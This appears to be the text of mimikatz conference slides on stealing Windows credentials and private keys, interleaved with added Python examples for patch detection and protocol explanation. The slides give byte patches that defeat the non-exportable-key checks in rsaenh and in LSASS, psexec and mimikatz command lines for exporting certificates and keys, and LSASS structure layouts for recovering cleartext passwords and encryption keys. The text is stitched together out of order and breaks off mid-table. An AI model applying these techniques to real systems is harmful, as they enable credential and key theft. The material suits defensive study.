.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi: demo time

Import, export, import as not exportable..., export
mimikatz crypto patchcapi: limitations

Because
- I'm lazy
- I've seen, in the majority of cases, RSA keys for real life use
  • Elliptic Curve, a little...

mimikatz crypto::patchcapi only deals with
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll
mimikatz crypto cng: how it works?

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." - http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI...
- It is, but it's not perfect...
mimikatz crypto cng: how it's exported? ( level)

(diagram: Process -> CNG -- RPC --> KeyIso Service (LSASS Process): Ask to export Key -> DPAPI Decode -> Load Private Key -> Exportable? yes -> Exported Key; no -> NTE_NOT_SUPPORTED; "PLAYSKOOL"; NT6: System protected process, ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP)
mimikatz crypto patchcng: because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks if the key is exportable.

mimikatz # crypto::exportKeys [user]
Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportabilité : NON
        Taille clé    : 2048
        Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
        mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.

(diagram annotation: Exportable?)
mimikatz crypto patchcng: because sometimes I own LSASS

This time, checks and keys are in the LSASS process... And what?
I wrote "1" byte in LSASS memory space...

.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
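Both patches, the 4-byte one in rsaenh (slide "because I own my process") and the 1-byte one in ncrypt inside LSASS (this slide), follow the same pattern: a conditional branch around the "not exportable" error path becomes an unconditional one, and the relative displacement never changes because the replacement is exactly as long as the original. That is what an in-memory integrity check should look for. The following is an added example (not code from the slides or from mimikatz) that decodes the branch targets of the byte sequences shown on the slides and classifies the observed bytes against the expected ones; obtaining the live bytes from a process is an assumed input, not part of the block.

```python
"""Integrity-check example added here (not code from the slides or from mimikatz):
given the expected bytes of a branch in a loaded module and the bytes actually
observed at that address, decode both branch targets and say whether the
conditional check was turned into an unconditional jump.

The three (address, expected, observed) samples are the byte sequences shown on
the slides; reading a live process's memory to obtain 'observed' is left out
and is an assumed input."""
import struct


def decode_branch(addr, code):
    """Decode an x86 jnz/jmp (rel8 or rel32) at addr.

    Returns (kind, target, length). A 'nop; jmp rel32' pair is decoded as one
    6-byte unit because it replaces a 6-byte 'jnz rel32' in place."""
    op = code[0]
    if op == 0x75:                          # jnz rel8
        return "jnz", addr + 2 + struct.unpack("<b", code[1:2])[0], 2
    if op == 0xEB:                          # jmp rel8
        return "jmp", addr + 2 + struct.unpack("<b", code[1:2])[0], 2
    if op == 0x0F and code[1] == 0x85:      # jnz rel32 (0F 85 + rel32)
        return "jnz", addr + 6 + struct.unpack("<i", code[2:6])[0], 6
    if op == 0xE9:                          # jmp rel32
        return "jmp", addr + 5 + struct.unpack("<i", code[1:5])[0], 5
    if op == 0x90 and code[1] == 0xE9:      # nop; jmp rel32: the jmp starts at addr+1
        return "nop;jmp", addr + 6 + struct.unpack("<i", code[2:6])[0], 6
    raise ValueError(f"unsupported opcode at {addr:#x}: {code[:2].hex()}")


def classify(addr, expected, observed):
    """'intact', 'patched: ...' when a jnz became a jmp to the same target, else 'modified'."""
    if expected == observed:
        return "intact"
    k_exp, t_exp, _ = decode_branch(addr, expected)
    k_obs, t_obs, _ = decode_branch(addr, observed)
    if k_exp == "jnz" and k_obs in ("jmp", "nop;jmp") and t_exp == t_obs:
        return f"patched: jnz made unconditional, same target {t_obs:#010x}"
    return "modified: unexpected bytes"


# Samples from the slides: rsaenh (two 6-byte sites) and ncrypt in LSASS (one 2-byte site).
SAMPLES = [
    (0x0AC0B7CB, bytes.fromhex("0F8533C7FFFF"), bytes.fromhex("90E933C7FFFF")),
    (0x0AC1F749, bytes.fromhex("0F85B63BFFFF"), bytes.fromhex("90E9B63BFFFF")),
    (0x6C815210, bytes.fromhex("751C"), bytes.fromhex("EB1C")),
]


def run_checks(samples=SAMPLES):
    """Classify every sample; returns a list of (address, verdict)."""
    return [(addr, classify(addr, exp, obs)) for addr, exp, obs in samples]


if __name__ == "__main__":
    for addr, verdict in run_checks():
        print(f"{addr:#010x}: {verdict}")
```

The displacement is relative to the end of the instruction, so "0F 85 rel32" at X and "90, E9 rel32" at X and X+1 both end at X+6 and land on the same target; likewise "75 rel8" and "EB rel8". Comparing only the first opcode byte of each check site against the on-disk image is therefore enough to spot this family of patches, and the decoder above tells you the patch kept the original control-flow target rather than redirecting it elsewhere.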
mimikatz crypto patchcng: demo time

Import, export, import as not exportable..., export again
mimikatz crypto patchcng: limitations

Patch operation needs some privileges
- Admin (debug privilege)
- SYSTEM

mimikatz crypto::patchcng only deals with
- Microsoft Software Key Storage Provider (maybe other algs than RSA)

Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates... even those that are exportable (hu?)
- certutil can...
mimikatz crypto patchcng: bonus

After one admin patched LSASS, all users of the current system benefit from extra exports
- until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for export can work too
- Yeah, like the good old certutil

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz crypto: memo

Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password
- PFX files are protected by this password: mimikatz
Keys
- When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
- When you delete a certificate, Windows does not delete its private key... funny, isn't it?
  • So yes, mimikatz can export it
mimikatz crypto: what we can do?

Exactly the same as for sekurlsa: it will prevent access to accounts/computer
- no admin, no admin, no admin...

Basics
- Use smartcards/tokens for users' certificates
- Use Hardware Security Modules (HSM), even SoftHSM

More in depth
- See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
- Verify vendors' implementation (Lenovo, Dell, ...) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz: what else can it do?

Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
- Play with tokens & privileges
- Display SSDT x86 & x64
- List minifilters actions
- List Notifications (process, thread, image, registry)
- List Objects hooks and procedures
- ...
...
mimikatz: that's all folks

Thanks to / Merci à
- my girlfriend for her support (her LSASS crashed a few times)
- Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
- Microsoft, for always considering it as normal/acceptable
- Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, ...
- You, for your attention

Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact

blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz sekurlsa tspkg: what is it?

Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDesktop users' experience
- http://technet.microsoft.com/library/cc772108.aspx
Relies on CredSSP with Credentials Delegation (= Account delegation)
- Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression: it seems cool
- User does not have to type its password
- Password is not in RDP file
- Password is not in user secrets
mimikatz sekurlsa tspkg: questions

KB says that for it to work, we must enable « Default credentials » delegation
- "Default credentials: The credentials obtained when the user first logs on to Windows" - https://msdn.microsoft.com/library/bb204773.aspx
  • What? Our User/Domain/Password? | Hash? | Ticket? It seems...
- In all cases the system seems to be vulnerable to pass-the-...

In what form? Our specs: [MS-CSSP]
- 2.2.1.2.1 TSPasswordCreds
  • The TSPasswordCreds structure contains the user's password credentials that are delegated to the server (or PIN)
    TSPasswordCreds ::= SEQUENCE {
        domainName  [0] OCTET STRING,
        userName    [1] OCTET STRING,
        password    [2] OCTET STRING
    }
- Challenge response for authentication?
  • Server: YES (TLS, Kerberos)
  • Client: NO, password is sent to server...

So the password resides somewhere in memory
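To make the "Client: NO" point concrete: TSPasswordCreds carries the password itself, not a proof of knowledge, so the only thing between it and the server (or anyone who can decrypt the TLS tunnel) is the outer TLS layer. The block below is an added example (not code from the slides or from mimikatz) that DER-encodes and decodes the structure above with constructed credential values; it assumes explicit context tags ([0], [1], [2] each wrapping an OCTET STRING) and UTF-16LE string contents, which is how this example reads [MS-CSSP].

```python
"""Added example (not from the slides or mimikatz): encode and decode the
TSPasswordCreds structure from [MS-CSSP] to show that delegated credentials are
three plain OCTET STRINGs. Assumed: explicit context tags ([0], [1], [2] wrap an
OCTET STRING) and UTF-16LE string contents, as the example reads the spec; the
sample credential values are constructed."""


def der_encode(tag, content):
    """Minimal DER TLV encoder (short and long length forms)."""
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content


def der_tlv(data, i=0):
    """Parse one TLV at data[i]; returns (tag, content, index_after)."""
    tag = data[i]
    first = data[i + 1]
    if first < 0x80:
        length, j = first, i + 2
    else:
        n = first & 0x7F
        length, j = int.from_bytes(data[i + 2:i + 2 + n], "big"), i + 2 + n
    if j + length > len(data):
        raise ValueError("truncated DER element")
    return tag, data[j:j + length], j + length


FIELD_NAMES = {0: "domainName", 1: "userName", 2: "password"}


def encode_ts_password_creds(domain, user, password):
    """TSPasswordCreds ::= SEQUENCE { domainName [0] OCTET STRING, userName [1] ..., password [2] ... }"""
    fields = []
    for idx, value in enumerate((domain, user, password)):
        octets = der_encode(0x04, value.encode("utf-16-le"))   # OCTET STRING
        fields.append(der_encode(0xA0 | idx, octets))          # [idx] EXPLICIT, constructed
    return der_encode(0x30, b"".join(fields))                  # SEQUENCE


def decode_ts_password_creds(blob):
    """Inverse of encode_ts_password_creds; returns a dict of the three fields."""
    tag, body, _ = der_tlv(blob)
    if tag != 0x30:
        raise ValueError("expected SEQUENCE")
    out, i = {}, 0
    while i < len(body):
        ctag, inner, i = der_tlv(body, i)
        if (ctag & 0xE0) != 0xA0:
            raise ValueError(f"unexpected tag {ctag:#x}")
        otag, octets, _ = der_tlv(inner)
        if otag != 0x04:
            raise ValueError("expected OCTET STRING")
        out[FIELD_NAMES[ctag & 0x1F]] = octets.decode("utf-16-le")
    return out


def password_visible(blob, password):
    """True if the password bytes appear as-is in the encoded structure."""
    return password.encode("utf-16-le") in blob


if __name__ == "__main__":
    blob = encode_ts_password_creds("vm-w8-rp-x", "Gentil Kiwi", "waza1234")
    print(blob.hex())
    print(decode_ts_password_creds(blob))
    print("password in clear inside TSPasswordCreds:", password_visible(blob, "waza1234"))
```

The decoder is the part a defender reuses: pointed at a decrypted CredSSP capture from a lab session, it shows exactly what a Terminal Server receives, which is the same thing tspkg has to keep in LSASS to send it.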
mimikatz sekurlsa tspkg: symbols & theory

Let's explore some symbols
- sounds cool... (thanks Microsoft)

Let's imagine a scenario
- Enumerate all sessions to obtain
  • Username
  • Domain
  • LUID
- Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with LUID to obtain
  • TS_CREDENTIAL
- Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
  • TS_PRIMARY_CREDENTIAL with clear text credentials...

kd> x tspkg!*clear*
75016d1c          tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68          tspkg!TSDuplicatePassword = <no type information>
75011cd4          tspkg!TSHidePassword = <no type information>
750195ee          tspkg!TSRevealPassword = <no type information>
75012fbd          tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b          tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz sekurlsa tspkg: workflow

(diagram: LsaEnumerateLogonSessions -> for each LUID -> tspkg!TSGlobalCredTable -> RtlLookupElementGenericTableAvl -> KIWI_TS_CREDENTIAL -> LsaUnprotectMemory -> KIWI_TS_PRIMARY_CREDENTIAL -> password in clear)

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz sekurlsa tspkg: demo time

sekurlsa::tspkg

mimikatz sekurlsa wdigest
because clear text password over http/https is not cool
mimikatz sekurlsa wdigest: what is it?

"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network [...]" Wikipedia: http://en.wikipedia.org/wiki/Digest_access_authentication

"Common Digest Authentication Scenarios
- Authenticated client access to a Web site
- Authenticated client access using SASL
- Authenticated client access with integrity protection to a directory service using LDAP" Microsoft: http://technet.microsoft.com/library/cc778868.aspx

Again, it seems cool
- No password over the network, just hashes
- No reversible password in Active Directory, hashes for each realm
  • Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest :: what is it?
We speak about hashes, but what hashes? H = MD5(HA1:nonce:[...]:HA2)
- HA1 = MD5(username:realm:password)
- HA2 = MD5(method:digestURI[...])
Even after login, HA1 may change... realm is from server side and cannot be determined before Windows logon.
WDigest provider must have elements to compute responses for different servers:
- Username
- Realm (from server)
- Password
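The argument above, worked through in code as an added example (not code from the talk or from mimikatz): the RFC 2617 digest computation, and two hypothetical providers, one that keeps only precomputed HA1 values and one that keeps the password, answering a challenge from a realm never seen at logon. The challenge headers and the second realm are constructed; the first is the RFC 2617 worked example.

```python
"""Digest authentication (RFC 2617, qop=auth) worked through end to end.
HA1 is bound to the realm, and the realm only arrives in the server's
challenge, so a provider that must answer any server cannot precompute
HA1 at logon: it either keeps the password or fails on every realm it
has not seen before. Provider classes and names are hypothetical."""
import hashlib


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password); the realm comes from the server."""
    return md5hex(f"{username}:{realm}:{password}")


def ha2(method: str, uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop=auth."""
    return md5hex(f"{method}:{uri}")


def digest_response(h1: str, method: str, uri: str, nonce: str,
                    nc: str, cnonce: str, qop: str = "auth") -> str:
    """response = MD5(HA1:nonce:nc:cnonce:qop:HA2)."""
    return md5hex(f"{h1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2(method, uri)}")


def parse_challenge(header: str) -> dict:
    """Pull realm/nonce/qop out of a 'Digest ...' challenge string.
    Minimal parser for the constructed inputs below, not the full grammar."""
    body = header.split(" ", 1)[1]  # drop the 'Digest' scheme word
    fields = {}
    for part in body.split(","):
        key, _, value = part.strip().partition("=")
        fields[key.strip()] = value.strip().strip('"')
    return fields


class HashOnlyProvider:
    """Hypothetical provider storing only HA1 per (user, realm) seen at
    logon. It cannot answer a challenge from a realm it has never seen."""

    def __init__(self):
        self._ha1 = {}

    def enroll(self, username, realm, password):
        self._ha1[(username, realm)] = ha1(username, realm, password)

    def answer(self, username, challenge, method, uri, nc, cnonce):
        h1 = self._ha1.get((username, challenge["realm"]))
        if h1 is None:
            return None  # unknown realm: no HA1, so no response is possible
        return digest_response(h1, method, uri, challenge["nonce"], nc,
                               cnonce, challenge.get("qop", "auth"))


class PasswordProvider:
    """What a provider like WDigest has to do: keep username + password so
    HA1 can be derived for whatever realm the next server announces."""

    def __init__(self):
        self._pw = {}

    def enroll(self, username, password):
        self._pw[username] = password  # the secret that must stay in memory

    def answer(self, username, challenge, method, uri, nc, cnonce):
        h1 = ha1(username, challenge["realm"], self._pw[username])
        return digest_response(h1, method, uri, challenge["nonce"], nc,
                               cnonce, challenge.get("qop", "auth"))


# Constructed challenges from two servers announcing different realms.
CHALLENGE_A = ('Digest realm="testrealm@host.com", qop="auth", '
               'nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093"')
CHALLENGE_B = ('Digest realm="intranet.example", qop="auth", '
               'nonce="5d2f0a0ad3c1b7e4"')


def rfc2617_example() -> str:
    """RFC 2617 section 3.5 worked example; expected response is
    '6629fae49393a05397450978507c4ef1'."""
    ch = parse_challenge(CHALLENGE_A)
    h1 = ha1("Mufasa", ch["realm"], "Circle Of Life")
    return digest_response(h1, "GET", "/dir/index.html", ch["nonce"],
                           "00000001", "0a4f113b", ch["qop"])


def compare_providers():
    """Both providers are enrolled against realm A only, then realm B
    challenges. Returns (hash-only answer, password-provider answer)."""
    hashed, withpw = HashOnlyProvider(), PasswordProvider()
    hashed.enroll("Mufasa", "testrealm@host.com", "Circle Of Life")
    withpw.enroll("Mufasa", "Circle Of Life")
    ch_b = parse_challenge(CHALLENGE_B)
    args = ("Mufasa", ch_b, "GET", "/", "00000001", "0a4f113b")
    return hashed.answer(*args), withpw.answer(*args)


if __name__ == "__main__":
    print("RFC 2617 response:", rfc2617_example())
    print("realm B, hash-only vs password provider:", compare_providers())
```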
mimikatz :: sekurlsa :: wdigest :: theory
This time we know:
- that WDigest keeps password in memory « by protocol » for HA1 digest
- that LSASS loves to unprotect password with LsaUnprotectMemory (so protects with LsaProtectMemory)
LsaUnprotectMemory:
- At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
- Let's perform a research in WDigest
- Hypothesis seems verified
LsaProtectMemory:
- At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
- Let's perform a research in WDigest
- SpAcceptCredentials takes clear password in args
  * Protect it with LsaProtectMemory
  * Update or insert data in double linked list wdigest!l_LogSessList
.text:7409D151 _DigestCalcHA1@8        call dword ptr [eax+0B4h]
.text:74096C69 _SpAcceptCredentials@16 call dword ptr [eax+0B0h]
mimikatz :: sekurlsa :: wdigest :: workflow
[diagram] LsaEnumerateLogonSessions -> for each LUID -> search linked list wdigest!l_LogSessList for LUID -> KIWI_WDIGEST_LIST_ENTRY -> LsaUnprotectMemory -> password in clear
typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    [...]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    [...]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest :: demo time
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp :: how?
Actually I've only used a logical (empirical) approach to search passwords...
- Protocol reading
- Symbols searching
~ Boring ~... be more brutal this time: make a WinDBG trap!
0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz :: sekurlsa :: livessp :: how?
Let's login with a Live account on Windows 8.
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest).
Call stacks caught by the trap:
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  [...]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
Our LiveSSP provider!
Yeah! Pass the Hash capability with Live account too...
Live user can logon through RDP via SSO.
mimikatz :: sekurlsa :: livessp :: workflow
[diagram] LsaEnumerateLogonSessions -> for each LUID -> search linked list livessp!LiveGlobalLogonSessionList for LUID -> KIWI_LIVESSP_LIST_ENTRY -> KIWI_LIVESSP_PRIMARY_CREDENTIAL (suppCreds) -> LsaUnprotectMemory -> password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me: yes!
mimikatz :: sekurlsa :: kerberos
Let's login with a normal account.
After credentials protection, KerbCreateLogonSession calls:
- NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
- NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList
Call stacks caught by the trap:
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
(Kerberos ticket part? Maybe ;))

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
(Kerberos part for password)

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz :: sekurlsa :: kerberos (nt6) :: workflow
[diagram] LsaEnumerateLogonSessions -> for each LUID -> RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable -> KIWI_KERBEROS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) :: workflow
[diagram] LsaEnumerateLogonSessions -> for each LUID -> search linked list kerberos!KerbLogonSessionList for LUID -> KIWI_KERBEROS_LOGON_SESSION -> LsaUnprotectMemory -> password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    [...]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa :: demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos :: "hu?"
Ok, it works...
But why?
Not at all logon on NT5 (can need an unlock).
From my understanding of Microsoft explanations:
- no need of passwords for the Kerberos protocol...
- all is based on the hash (not very sexy too)
Microsoft's implementation of Kerberos is full of logical...
- For password auth:
  * password hash for shared secret, but keeping password in memory
- For full smartcard auth:
  * No password on client
  * No hash on client
    - NTLM hash on client...
    - KDC sent it back as a gift
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, so that they can be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them.
- This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) in the LSASS process, to benefit from its keys when we called it.
Can it be fun to decrypt outside the process?
- Yes it is... no more injection, just reading memory of the LSASS process...
mimikatz can use lsasrv.dll too and "imports" LSASS initialized keys.
- When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS.
mimikatz :: sekurlsa :: LsaEncryptMemory :: NT5
Depending on the size of the secret, LsaEncryptMemory uses:
- RC4
- DESx
[diagram] Keys in lsass (lsasrv): g_cbRandomKey DWORD (256), g_pRandomKey BYTE[g_cbRandomKey], g_pDESXKey BYTE[144], g_Feedback BYTE[8] -> copy... -> mimikatz (lsasrv)
mimikatz :: sekurlsa :: LsaEncryptMemory :: NT6
Depending on the size of the secret, LsaEncryptMemory uses:
- 3DES
- AES
[diagram] Keys in lsass (lsasrv): InitializationVector BYTE[16], h3DesKey (KIWI_BCRYPT_KEY), hAesKey (KIWI_BCRYPT_KEY) -> copy... -> mimikatz
typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;
mimikatz :: sekurlsa :: memo
Security Packages
Package          Symbols                                  Type
